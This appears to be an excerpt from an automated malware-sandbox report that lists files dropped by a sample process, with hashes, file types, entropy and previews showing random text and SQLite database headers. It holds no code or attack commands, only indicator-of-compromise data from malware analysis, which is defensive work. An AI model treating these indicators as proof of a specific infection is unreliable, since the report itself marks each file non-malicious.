                                                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                  Malicious:false
                                                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.690394987545919
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                  MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                  SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                  SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                  SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                  Malicious:false
                                                                                                  Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.696250160603532
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                  Malicious:false
                                                                                                  Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.696250160603532
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                  Malicious:false
                                                                                                  Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                  Category:dropped
                                                                                                  Size (bytes):114688
                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                  Category:dropped
                                                                                                  Size (bytes):114688
                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                  Category:dropped
                                                                                                  Size (bytes):114688
                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                  Category:dropped
                                                                                                  Size (bytes):114688
                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                  Category:dropped
                                                                                                  Size (bytes):114688
                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                  Category:dropped
                                                                                                  Size (bytes):114688
                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                  Category:dropped
                                                                                                  Size (bytes):114688
                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40960
                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.699434772658264
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                  Malicious:false
                                                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.695685570184741
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                  Malicious:false
                                                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                  Process:C:\Users\user\Desktop\3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.695685570184741
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                  Malicious:false
